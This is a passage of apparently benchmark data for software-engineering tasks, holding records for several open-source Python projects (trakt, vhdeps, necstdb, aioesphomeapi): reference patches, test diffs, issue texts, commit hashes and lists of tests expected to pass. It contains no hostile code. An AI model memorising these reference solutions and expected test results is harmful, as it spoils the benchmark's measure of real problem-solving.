- {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/900/posters/medium/d67bbc0a62.jpg", "full": "https://walter.trakt.us/images/shows/000/000/900/posters/original/d67bbc0a62.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/900/posters/thumb/d67bbc0a62.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/900/fanarts/medium/1eae79bc72.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/000/900/fanarts/thumb/1eae79bc72.jpg"}}, "year": "1987", "ids": {"trakt": 900, "slug": "french-saunders"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/medium/5bd7342a6a.jpg", "full": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/original/5bd7342a6a.jpg", "thumb": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/thumb/5bd7342a6a.jpg"}}, "title": "Batman", "season": 5, "number": 4, "ids": {"trakt": 59025, "tvrage": 64781, "tmdb": null, "imdb": "", "tvdb": 165596}}, "score": 91.11184}
- ]
- },
- "search?query=cranston&type=person": {
+ "search/person?query=cranston": {
"GET": [
{"type": "person", "person": {"images": {"headshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 154029, "tvrage": null, "slug": "bob-cranston", "imdb": "", "tmdb": 587197}, "name": "Bob Cranston"}, "score": 94.57829},
{"type": "person", "person": {"images": {"headshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 364188, "tvrage": null, "slug": "al-cranston", "imdb": "", "tmdb": 1309602}, "name": "Al Cranston"}, "score": 94.57829},
diff --git a/tests/test_episodes.py b/tests/test_episodes.py
index 0561180..530882e 100644
--- a/tests/test_episodes.py
+++ b/tests/test_episodes.py
@@ -20,7 +20,7 @@ def test_episode_search():
def test_episode_search_with_year():
results = TVEpisode.search('batman', year=1987)
assert isinstance(results, list)
- assert len(results) == 1
+ assert len(results) == 10
assert all(isinstance(m, TVEpisode) for m in results)
diff --git a/tests/test_search.py b/tests/test_search.py
index 785bcba..7e4a2ba 100644
--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -3,22 +3,12 @@
import pytest
from trakt.movies import Movie
from trakt.people import Person
-from trakt.sync import search, search_by_id
+from trakt.sync import get_search_results, search, search_by_id, SearchResult
from trakt.tv import TVEpisode, TVShow
__author__ = 'Reinier van der Windt'
-def test_invalid_searches():
- """test that the proper exceptions are raised when an invalid search or id
- type is provided to a search function
- """
- functions = [search, search_by_id]
- for fn in functions:
- with pytest.raises(ValueError):
- fn('shouldfail', 'fake')
-
-
def test_search_movie():
"""test that movie search results are successfully returned"""
batman_results = search('batman')
@@ -26,10 +16,11 @@ def test_search_movie():
assert len(batman_results) == 2
assert all(isinstance(m, Movie) for m in batman_results)
+
def test_search_movie_with_year():
batman_results = search('batman', year='1966')
assert isinstance(batman_results, list)
- assert len(batman_results) == 1
+ assert len(batman_results) == 2
assert all(isinstance(m, Movie) for m in batman_results)
@@ -79,3 +70,12 @@ def test_search_person_by_id():
results = search_by_id('nm0186505', id_type='imdb')
assert isinstance(results, list)
assert all(isinstance(p, Person) for p in results)
+
+
+def test_get_search_results():
+ """test that entire results can be returned by get_search_results"""
+ results = get_search_results('batman', search_type=['movie'])
+ assert isinstance(results, list)
+ assert len(results) == 2
+ assert all(isinstance(r, SearchResult) for r in results)
+ assert all([r.score != 0.0 for r in results])
diff --git a/tests/test_shows.py b/tests/test_shows.py
index 518b5d5..a3f5bb5 100644
--- a/tests/test_shows.py
+++ b/tests/test_shows.py
@@ -91,7 +91,7 @@ def test_show_search():
def test_show_search_with_year():
results = TVShow.search('batman', year=1999)
assert isinstance(results, list)
- assert len(results) == 1
+ assert len(results) == 10
assert all(isinstance(m, TVShow) for m in results)
|
score is not added in the Movie class
Hi
I can see there is a `score` field in the response but can't find it in in the `Movie` class in this library
https://trakt.docs.apiary.io/#reference/search/text-query/get-text-query-results
I want this field, is there a way to get it?
|
0.0
|
490b465291cb546a903160007aa2eacc85cd4d7c
|
[
"tests/test_episodes.py::test_get_episodes",
"tests/test_episodes.py::test_episode_search",
"tests/test_episodes.py::test_episode_search_with_year",
"tests/test_episodes.py::test_get_episode",
"tests/test_episodes.py::test_episode_comments",
"tests/test_episodes.py::test_episode_ratings",
"tests/test_episodes.py::test_episode_watching_now",
"tests/test_episodes.py::test_episode_images",
"tests/test_episodes.py::test_episode_ids",
"tests/test_episodes.py::test_rate_episode",
"tests/test_episodes.py::test_oneliners",
"tests/test_episodes.py::test_episode_comment",
"tests/test_episodes.py::test_episode_scrobble",
"tests/test_episodes.py::test_episode_magic_methods",
"tests/test_search.py::test_search_movie",
"tests/test_search.py::test_search_movie_with_year",
"tests/test_search.py::test_search_show",
"tests/test_search.py::test_search_episode",
"tests/test_search.py::test_search_person",
"tests/test_search.py::test_search_movie_by_id",
"tests/test_search.py::test_search_show_by_id",
"tests/test_search.py::test_search_episode_by_id",
"tests/test_search.py::test_search_person_by_id",
"tests/test_search.py::test_get_search_results",
"tests/test_shows.py::test_dismiss_show_recomendation",
"tests/test_shows.py::test_recommended_shows",
"tests/test_shows.py::test_trending_shows",
"tests/test_shows.py::test_popular_shows",
"tests/test_shows.py::test_updated_shows",
"tests/test_shows.py::test_get_show",
"tests/test_shows.py::test_aliases",
"tests/test_shows.py::test_translations",
"tests/test_shows.py::test_get_comments",
"tests/test_shows.py::test_get_people",
"tests/test_shows.py::test_ratings",
"tests/test_shows.py::test_related",
"tests/test_shows.py::test_watching",
"tests/test_shows.py::test_show_search",
"tests/test_shows.py::test_show_search_with_year",
"tests/test_shows.py::test_show_ids",
"tests/test_shows.py::test_oneliners",
"tests/test_shows.py::test_show_comment",
"tests/test_shows.py::test_rate_show"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-06-26 02:06:30+00:00
|
apache-2.0
| 4,027
|
|
abs-tudelft__vhdeps-22
|
diff --git a/vhdeps/targets/ghdl.py b/vhdeps/targets/ghdl.py
index 3e0e2b8..ff426a1 100644
--- a/vhdeps/targets/ghdl.py
+++ b/vhdeps/targets/ghdl.py
@@ -81,7 +81,22 @@ def add_arguments(parser):
'regardless of whether it passed or not. If there are multiple test '
'cases, gtkwave is launched for the first failure.')
-def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False, coverage=None, **_):
+ parser.add_argument(
+ '-W', action='append', metavar='#{#},<options>', dest='extra_args',
+ # It'd be great to use [] here ^^^ but Python devs managed to
+ # sufficiently bork argparse's internals to make that break before
+ # Python 3.8. Since it's completely asenine to require 3.8 for
+ # something like this, {} will have to do.
+ help='Pass comma-separated options to the command specified by #. The '
+ 'first # can be \'a\' for the analysis command, \'e\' for the '
+ 'elaboration command, and \'r\' for the run command. If a second '
+ 'character is specified, <options> are chained to a \'-W#,<options>\' '
+ 'option for the command specified by the first letter. For instance, '
+ '\'-Wac,-O3\' passes -O3 to the GCC compiler during the analysis '
+ 'phase.')
+
+def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False,
+ coverage=None, extra_args=None, **_):
"""Returns a three-tuple of the analyze, elaborate, and run commands for
GHDL in plumbum form."""
@@ -130,6 +145,25 @@ def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False, coverage=None, **_
ghdl_analyze = ghdl_analyze['-Wc,-fprofile-arcs', '-Wc,-ftest-coverage', '-Wc,-O3']
ghdl_elaborate = ghdl_elaborate['-Wl,-lgcov']
+ # Add user-specified extra arguments.
+ if extra_args:
+ for extra_arg in extra_args:
+ if ',' not in extra_arg:
+ raise ValueError('invalid value for -W')
+ target, *args = extra_arg.split(',')
+ if len(target) not in (1, 2):
+ raise ValueError('invalid value for -W')
+ if len(target) == 2:
+ args = ['-W%s,%s' % (target[1], ','.join(args))]
+ if target[0] == 'a':
+ ghdl_analyze = ghdl_analyze[args]
+ elif target[0] == 'e':
+ ghdl_elaborate = ghdl_elaborate[args]
+ elif target[0] == 'r':
+ ghdl_run = ghdl_run[args]
+ else:
+ raise ValueError('invalid value for -W')
+
return ghdl_analyze, ghdl_elaborate, ghdl_run
def _run_test_case(output_file, test_case, vcd_dir, ghdl_elaborate, ghdl_run):
|
abs-tudelft/vhdeps
|
f2b55a77340e99d13e1adea753c63d10f2b06d79
|
diff --git a/tests/test_ghdl.py b/tests/test_ghdl.py
index a02b2a8..9e16da5 100644
--- a/tests/test_ghdl.py
+++ b/tests/test_ghdl.py
@@ -2,6 +2,7 @@
from unittest import TestCase, skipIf
from unittest.mock import patch
+import re
import os
import tempfile
from plumbum import local
@@ -254,6 +255,22 @@ class TestGhdlSpecific(TestCase):
code, _, _ = run_vhdeps('ghdl', '-i', DIR+'/simple/multiple-ok', '-j')
self.assertEqual(code, 1)
+ def test_extra_options(self):
+ """Test the -W option for GHDL"""
+ with local.env(PATH=DIR+'/ghdl/fake-ghdl:' + local.env['PATH']):
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-W'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-Wx'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-W,x'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-Wx,x'), 0)
+ code, out, _ = run_vhdeps(
+ 'ghdl', '-i', DIR+'/simple/all-good',
+ '-Wa,a,na,lyze', '-We,e,la,bo,rate', '-Wr,run', '-Wrx,a,b,c')
+ self.assertEqual(code, 0)
+ self.assertTrue(bool(re.search(r'ghdl -a [^\n]* a na lyze', out)))
+ self.assertTrue(bool(re.search(r'ghdl -e [^\n]* e la bo rate', out)))
+ self.assertTrue(bool(re.search(r'ghdl -r [^\n]* run', out)))
+ self.assertTrue(bool(re.search(r'ghdl -r [^\n]* -Wx,a,b,c', out)))
+
@skipIf(
not coverage_supported(),
|
Passing arbitrary arguments to GHDL
Sometimes one might want to pass some extra arguments to GHDL, especially with the GCC backend to pass additional compiler flags. There is currently no command-line syntax for this.
|
0.0
|
f2b55a77340e99d13e1adea753c63d10f2b06d79
|
[
"tests/test_ghdl.py::TestGhdlSpecific::test_extra_options"
] |
[
"tests/test_ghdl.py::TestGhdlSpecific::test_analyze_error",
"tests/test_ghdl.py::TestGhdlSpecific::test_elaborate_error",
"tests/test_ghdl.py::TestGhdlSpecific::test_multi_version",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_ghdl",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_plumbum",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_wc",
"tests/test_ghdl.py::TestGhdlSpecific::test_unknown_version"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-07-12 14:41:55+00:00
|
apache-2.0
| 860
|
|
ogawa-ros__necstdb-27
|
diff --git a/necstdb/necstdb.py b/necstdb/necstdb.py
index 05c1bb3..9715f1e 100644
--- a/necstdb/necstdb.py
+++ b/necstdb/necstdb.py
@@ -7,20 +7,20 @@ timestamp), various kinds of weather data (temperature + humidity + wind speed +
direction + ... + timestamp), etc.
"""
-
-from typing import Union, List, Tuple, Dict, Any
-import re
-import os
+import json
import mmap
-import struct
+import os
import pathlib
-import json
+import re
+import struct
import tarfile
+from typing import Any, Dict, List, Tuple, Union
import numpy
import pandas
from . import utils
+from .recover import recover
def duplicate_rename(path: pathlib.Path, _i: int = 0) -> pathlib.Path:
@@ -423,9 +423,12 @@ class table:
for col in cols:
size = struct.calcsize(col["format"])
+ if "x" in col["format"]: # Pad field
+ offset += col["size"]
+ continue
dat = struct.unpack(col["format"], data[offset : offset + size])
if len(dat) == 1:
- dat = dat[0]
+ (dat,) = dat
dict_[col["key"]] = dat
offset += col["size"]
@@ -448,18 +451,28 @@ class table:
formats = [col["format"] for col in cols]
def parse_dtype(format_character: str) -> str:
+ def str_format(length: Union[str, int], count: Union[str, int]):
+ count = count if int(count) > 1 else ""
+ return f"{count}S{length}"
+
format_character = re.sub(
r"^([\d+s]+)$",
- lambda m: f"{m.group(1).count('s')}S{m.group(1).split('s')[0]}",
+ lambda m: str_format(m.group(1).split("s")[0], m.group(1).count("s")),
format_character,
)
+
+ format_character = format_character.replace("x", "V")
return self.endian + format_character
np_formats = [parse_dtype(col["format"]) for col in cols]
keys = [col["key"] for col in cols]
offsets = utils.get_struct_indices(formats, self.endian)[:-1]
+
+ pad = ["x" in col["format"] for col in cols]
+ data_field = [k for k, p in zip(keys, pad) if not p]
+
dtype = numpy.dtype({"names": keys, "formats": np_formats, "offsets": offsets})
- return numpy.frombuffer(data, dtype=dtype)
+ return numpy.frombuffer(data, dtype=dtype)[data_field]
@property
def recovered(self) -> "table":
@@ -481,11 +494,7 @@ class table:
such as 1e-308)
"""
- self.endian = ""
- self.open(self._name, self._mode)
- for dat in self.header["data"]:
- dat["format"] = dat["format"].replace("i", "?")
- return self
+ return recover(self)
def opendb(path: os.PathLike, mode: str = "r") -> "necstdb":
diff --git a/necstdb/recover.py b/necstdb/recover.py
new file mode 100644
index 0000000..8cd2671
--- /dev/null
+++ b/necstdb/recover.py
@@ -0,0 +1,52 @@
+from typing import TYPE_CHECKING
+
+import numpy
+
+if TYPE_CHECKING:
+ from .necstdb import table
+
+
+def recover(t: "table") -> "table":
+ fmt = "".join([d["format"] for d in t.header["data"]])
+
+ if (t.endian == "<") and ("i" in fmt):
+ t.endian = ""
+ t.open(t._name, t._mode)
+ for dat in t.header["data"]:
+ dat["format"] = dat["format"].replace("i", "?")
+
+ if "s" in fmt:
+ modified_header_data = []
+ for dat in t.header["data"]:
+ if "s" not in dat["format"]:
+ modified_header_data.append(dat)
+ else:
+ dat_numpy = t.read(astype="sa")
+ this_field = dat_numpy[dat["key"]]
+ lengths = numpy.unique([len(d) for d in this_field])
+ if len(lengths) > 1: # Not uniform length
+ modified_header_data.append(dat)
+ else:
+ (length,) = lengths
+ specified = int(dat["format"].rstrip("s"))
+ if length == specified:
+ modified_header_data.append(dat)
+ else:
+ diff = specified - length
+ modified_header_data.append(
+ {
+ "key": dat["key"],
+ "format": f"{length}s",
+ "size": length,
+ }
+ )
+ modified_header_data.append(
+ {
+ "key": f"_{dat['key']}_pad",
+ "format": f"{diff}x",
+ "size": diff,
+ }
+ )
+ t.header["data"] = modified_header_data
+
+ return t
diff --git a/poetry.lock b/poetry.lock
index 147b715..6c0b1f9 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -23,10 +23,10 @@ optional = false
python-versions = ">=3.5"
[package.extras]
-dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "zope-interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"]
-docs = ["furo", "sphinx", "zope-interface", "sphinx-notfound-page"]
-tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "zope-interface", "cloudpickle"]
-tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "cloudpickle"]
+dev = ["cloudpickle", "coverage[toml] (>=5.0.2)", "furo", "hypothesis", "mypy (>=0.900,!=0.940)", "pre-commit", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "sphinx", "sphinx-notfound-page", "zope.interface"]
+docs = ["furo", "sphinx", "sphinx-notfound-page", "zope.interface"]
+tests = ["cloudpickle", "coverage[toml] (>=5.0.2)", "hypothesis", "mypy (>=0.900,!=0.940)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "zope.interface"]
+tests_no_zope = ["cloudpickle", "coverage[toml] (>=5.0.2)", "hypothesis", "mypy (>=0.900,!=0.940)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins"]
[[package]]
name = "black"
@@ -106,9 +106,9 @@ typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""}
zipp = ">=0.5"
[package.extras]
-docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"]
+docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"]
perf = ["ipython"]
-testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "packaging", "pep517", "pyfakefs", "flufl-flake8", "pytest-perf (>=0.9.2)", "pytest-black (>=0.3.7)", "pytest-mypy", "importlib-resources (>=1.3)"]
+testing = ["flufl.flake8", "importlib-resources (>=1.3)", "packaging", "pep517", "pyfakefs", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.0.1)", "pytest-flake8", "pytest-mypy", "pytest-perf (>=0.9.2)"]
[[package]]
name = "iniconfig"
@@ -167,7 +167,7 @@ python-dateutil = ">=2.7.3"
pytz = ">=2017.2"
[package.extras]
-test = ["pytest (>=4.0.2)", "pytest-xdist", "hypothesis (>=3.58)"]
+test = ["hypothesis (>=3.58)", "pytest (>=4.0.2)", "pytest-xdist"]
[[package]]
name = "pathspec"
@@ -189,8 +189,8 @@ python-versions = ">=3.6"
importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
[package.extras]
-testing = ["pytest-benchmark", "pytest"]
-dev = ["tox", "pre-commit"]
+dev = ["pre-commit", "tox"]
+testing = ["pytest", "pytest-benchmark"]
[[package]]
name = "py"
@@ -317,8 +317,8 @@ optional = false
python-versions = ">=3.6"
[package.extras]
-docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"]
-testing = ["pytest (>=4.6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco-itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy"]
+docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"]
+testing = ["func-timeout", "jaraco.itertools", "pytest (>=4.6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.0.1)", "pytest-flake8", "pytest-mypy"]
[metadata]
lock-version = "1.1"
|
ogawa-ros/necstdb
|
fb254063d80c4f2a2c3047fe4a426e6de0ee6255
|
diff --git a/tests/test_necstdb.py b/tests/test_necstdb.py
index bb5e9f6..7e70c58 100644
--- a/tests/test_necstdb.py
+++ b/tests/test_necstdb.py
@@ -53,10 +53,11 @@ DATA4_HEADER = {
{"key": "array", "format": "3d", "size": 24},
]
}
-DATA5 = ([[b"abc", b"def", b"ghi"]] for _ in range(55))
+DATA5 = ([[b"abc", b"def", b"ghi"], b"jkl"] for _ in range(55))
DATA5_HEADER = {
"data": [
{"key": "strArray", "format": "3s3s3s", "size": 9},
+ {"key": "strLenMismatch", "format": "5s", "size": 5},
]
}
@@ -66,14 +67,17 @@ EXPECTED_DATA1_TUPLE = (3, -16, -32, -64)
EXPECTED_DATA2_TUPLE = (3, 16, 32, 64)
EXPECTED_DATA3_TUPLE = (0.32, 3, b"byte", b"c")
EXPECTED_DATA4_TUPLE = (True, b"str", 3, TIME, TIME)
-EXPECTED_DATA5_TUPLE = (b"abc", b"def", b"ghi")
+EXPECTED_DATA5_TUPLE = (b"abc", b"def", b"ghi", b"jkl\x00\x00")
# DTypes (int8, int16, ...) are not preserved.
EXPECTED_DATA1_DICT = {"int8": 3, "int16": -16, "int32": -32, "int64": -64}
EXPECTED_DATA2_DICT = {"uint8": 3, "uint16": 16, "uint32": 32, "uint64": 64}
EXPECTED_DATA3_DICT = {"float32": 0.32, "float64": 3, "_byte": b"byte", "_char": b"c"}
EXPECTED_DATA4_DICT = {"bool": True, "string": b"str", "array": (3, TIME, TIME)}
-EXPECTED_DATA5_DICT = {"strArray": (b"abc", b"def", b"ghi")}
+EXPECTED_DATA5_DICT = {
+ "strArray": (b"abc", b"def", b"ghi"),
+ "strLenMismatch": b"jkl\x00\x00",
+}
# DTypes (int8, int16, ...) are not preserved.
EXPECTED_DATA1_DF = pd.DataFrame(
@@ -88,7 +92,9 @@ EXPECTED_DATA3_DF = pd.DataFrame(
EXPECTED_DATA4_DF = pd.DataFrame(
[(True, b"str", [3, TIME, TIME])], columns=["bool", "string", "array"]
)
-EXPECTED_DATA5_DF = pd.DataFrame([(["abc", "def", "ghi"],)], columns=["strArray"])
+EXPECTED_DATA5_DF = pd.DataFrame(
+ [(["abc", "def", "ghi"], "jkl\x00\x00")], columns=["strArray", "strLenMismatch"]
+)
EXPECTED_DATA1_ARRAY = np.array(
[(3, -16, -32, -64)],
@@ -107,8 +113,8 @@ EXPECTED_DATA4_ARRAY = np.array(
dtype=[("bool", "?"), ("string", "S3"), ("array", "3f8")],
)
EXPECTED_DATA5_ARRAY = np.array(
- [(["abc", "def", "ghi"],)],
- dtype=[("strArray", "3S3")],
+ [(("abc", "def", "ghi"), "jkl\x00\x00")],
+ dtype=[("strArray", "(3,)S3"), ("strLenMismatch", "S5")],
)
EXPECTED_DATA1_BYTE = b"\x03\xf0\xff\xe0\xff\xff\xff\xc0\xff\xff\xff\xff\xff\xff\xff"
@@ -118,7 +124,7 @@ EXPECTED_DATA4_BYTE = (
b"\x01str"
b"\x00\x00\x00\x00\x00\x00\x08@\xea!\x1b\xc3\x1eJ\xd8A\xea!\x1b\xc3\x1eJ\xd8A"
)
-EXPECTED_DATA5_BYTE = b"abcdefghi"
+EXPECTED_DATA5_BYTE = b"abcdefghijkl\x00\x00"
@pytest.fixture(scope="module")
@@ -249,13 +255,13 @@ class TestReadDatabase:
assert all(EXPECTED_DATA3_ARRAY == actual["data3"][3])
assert all(EXPECTED_DATA4_ARRAY == actual["data4"][3])
assert len(actual["data4"][3]["array"]) == 3
- assert all(EXPECTED_DATA5_ARRAY == actual["data5"][3])
+ assert EXPECTED_DATA5_ARRAY == actual["data5"][3]
assert len(actual["data5"][3]["strArray"]) == 3
def test_read_as_bytes(self, db_path):
db = necstdb.opendb(db_path)
actual = {name: db.open_table(name).read(astype="raw") for name in table_name}
- formats = ["<bhiq", "<BHIQ", "<fd4sc", "<?3s3d", "<3s3s3s"]
+ formats = ["<bhiq", "<BHIQ", "<fd4sc", "<?3s3d", "<3s3s3s5s"]
unpacked = {
k: tuple(struct.iter_unpack(fmt, v))
for fmt, (k, v) in zip(formats, actual.items())
@@ -395,7 +401,7 @@ class TestMethods:
("data2", 330, 22, 15, "<BHIQ"),
("data3", 594, 33, 17, "<fd4sc"),
("data4", 1364, 44, 28, "<?3s3d"),
- ("data5", 495, 55, 9, "<3s3s3s"),
+ ("data5", 495, 55, 14, "<3s3s3s5s"),
],
columns=[
"table name",
diff --git a/tests/test_necstdb_recover.py b/tests/test_necstdb_recover.py
index acaed8e..2cb853d 100644
--- a/tests/test_necstdb_recover.py
+++ b/tests/test_necstdb_recover.py
@@ -4,12 +4,19 @@ import pytest
import necstdb
-EXAMPLE_DATA_PATH = pathlib.Path(".") / "tests" / "example_data"
+
+@pytest.fixture
+def db_path(tmp_path_factory) -> pathlib.Path:
+ """Path to temporary database directory."""
+ return tmp_path_factory.mktemp("test_db")
class TestReadDatabase:
- def test_read_db(self):
- db = necstdb.opendb(EXAMPLE_DATA_PATH)
+
+ EXAMPLE_DATA_PATH = pathlib.Path(".") / "tests" / "example_data"
+
+ def test_read_db_with_invalid_format_specifier(self):
+ db = necstdb.opendb(self.EXAMPLE_DATA_PATH)
_ = db.open_table("data4").read(astype="raw")
with pytest.raises(ValueError):
_ = db.open_table("data4").read(astype="tuple")
@@ -29,3 +36,26 @@ class TestReadDatabase:
print(actual)
actual = db.open_table("data4").recovered.read(astype="array")
print(actual)
+
+ def test_ignore_trailing_pad_bytes(self, db_path):
+ header = {
+ "data": [
+ {"key": "data", "format": "5s", "size": 5},
+ {"key": "bool", "format": "?", "size": 1},
+ ]
+ }
+
+ db = necstdb.opendb(db_path, mode="w")
+ db.create_table("string_length_missepecified", header)
+ table = db.open_table("string_length_missepecified", mode="ab")
+
+ data = b"abc"
+ _ = table.append(data, True)
+ table.close() # Close table to flush the data
+
+ table = db.open_table("string_length_missepecified").recovered
+ assert table.read(astype="raw")[:5] == data + b"\x00\x00" # Won't be recovered
+ assert table.read(astype="tuple")[0][0] == data
+ assert table.read(astype="dict")[0]["data"] == data
+ assert table.read(astype="df")["data"].values[0] == data
+ assert table.read(astype="sa")["data"][0] == data
|
Data type "|S12" does not unpacked when opening db specifying
Below works well
```python
>>>db = necstdb.opendb(data_path)
>>>obsmode = db.open_table("obsmode").read(astype="array")
```
However,
```python
>>>db = necstdb.opendb(data_path)
>>>obsmode = db.open_table("obsmode").read(astype="df")
>>>print(obsmode["obs_mode"])
b' \x00\x00'
```
pandas is very useful when manipulating time x 1-dimensional data
Could you please fix the issue?@KaoruNishikawa
|
0.0
|
fb254063d80c4f2a2c3047fe4a426e6de0ee6255
|
[
"tests/test_necstdb_recover.py::TestReadDatabase::test_ignore_trailing_pad_bytes"
] |
[
"tests/test_necstdb.py::TestWriteDatabase::test_create_table",
"tests/test_necstdb.py::TestWriteDatabase::test_write_table",
"tests/test_necstdb.py::TestWriteDatabase::test_write_file",
"tests/test_necstdb.py::TestReadDatabase::test_read_types",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_tuple",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_dict",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_df",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_array",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_bytes",
"tests/test_necstdb.py::TestReadDatabase::test_read_file",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_tuple",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_dict",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_df",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_bytes",
"tests/test_necstdb.py::TestMethods::test_list_tables",
"tests/test_necstdb.py::TestMethods::test_checkout",
"tests/test_necstdb.py::TestMethods::test_get_info",
"tests/test_necstdb_recover.py::TestReadDatabase::test_read_db_with_invalid_format_specifier"
] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-18 14:35:53+00:00
|
mit
| 4,343
|
|
esphome__aioesphomeapi-840
|
diff --git a/aioesphomeapi/client.py b/aioesphomeapi/client.py
index 63d23c5..dcb82df 100644
--- a/aioesphomeapi/client.py
+++ b/aioesphomeapi/client.py
@@ -928,6 +928,7 @@ class APIClient:
tilt: float | None = None,
stop: bool = False,
) -> None:
+ connection = self._get_connection()
req = CoverCommandRequest(key=key)
apiv = self.api_version
if TYPE_CHECKING:
@@ -951,7 +952,7 @@ class APIClient:
elif position == 0.0:
req.legacy_command = LegacyCoverCommand.CLOSE
req.has_legacy_command = True
- self._get_connection().send_message(req)
+ connection.send_message(req)
def fan_command(
self,
@@ -1058,6 +1059,7 @@ class APIClient:
custom_preset: str | None = None,
target_humidity: float | None = None,
) -> None:
+ connection = self._get_connection()
req = ClimateCommandRequest(key=key)
if mode is not None:
req.has_mode = True
@@ -1096,7 +1098,7 @@ class APIClient:
if target_humidity is not None:
req.has_target_humidity = True
req.target_humidity = target_humidity
- self._get_connection().send_message(req)
+ connection.send_message(req)
def number_command(self, key: int, state: float) -> None:
self._get_connection().send_message(NumberCommandRequest(key=key, state=state))
@@ -1172,6 +1174,7 @@ class APIClient:
def execute_service(
self, service: UserService, data: ExecuteServiceDataType
) -> None:
+ connection = self._get_connection()
req = ExecuteServiceRequest(key=service.key)
args = []
apiv = self.api_version
@@ -1196,7 +1199,7 @@ class APIClient:
# pylint: disable=no-member
req.args.extend(args)
- self._get_connection().send_message(req)
+ connection.send_message(req)
def _request_image(self, *, single: bool = False, stream: bool = False) -> None:
self._get_connection().send_message(
|
esphome/aioesphomeapi
|
a3009097a8cec6132f70c9790a38b19b16348c05
|
diff --git a/tests/test_client.py b/tests/test_client.py
index 2c290e5..b8b41fb 100644
--- a/tests/test_client.py
+++ b/tests/test_client.py
@@ -2280,3 +2280,55 @@ async def test_api_version_after_connection_closed(
assert client.api_version == APIVersion(1, 9)
await client.disconnect(force=True)
assert client.api_version is None
+
+
+@pytest.mark.asyncio
+async def test_calls_after_connection_closed(
+ api_client: tuple[
+ APIClient, APIConnection, asyncio.Transport, APIPlaintextFrameHelper
+ ],
+) -> None:
+ """Test calls after connection close should raise APIConnectionError."""
+ client, connection, transport, protocol = api_client
+ assert client.api_version == APIVersion(1, 9)
+ await client.disconnect(force=True)
+ assert client.api_version is None
+ service = UserService(
+ name="my_service",
+ key=1,
+ args=[],
+ )
+ with pytest.raises(APIConnectionError):
+ client.execute_service(service, {})
+ for method in (
+ client.button_command,
+ client.climate_command,
+ client.cover_command,
+ client.fan_command,
+ client.light_command,
+ client.media_player_command,
+ client.siren_command,
+ ):
+ with pytest.raises(APIConnectionError):
+ await method(1)
+
+ with pytest.raises(APIConnectionError):
+ await client.alarm_control_panel_command(1, AlarmControlPanelCommand.ARM_HOME)
+
+ with pytest.raises(APIConnectionError):
+ await client.date_command(1, 1, 1, 1)
+
+ with pytest.raises(APIConnectionError):
+ await client.lock_command(1, LockCommand.LOCK)
+
+ with pytest.raises(APIConnectionError):
+ await client.number_command(1, 1)
+
+ with pytest.raises(APIConnectionError):
+ await client.select_command(1, "1")
+
+ with pytest.raises(APIConnectionError):
+ await client.switch_command(1, True)
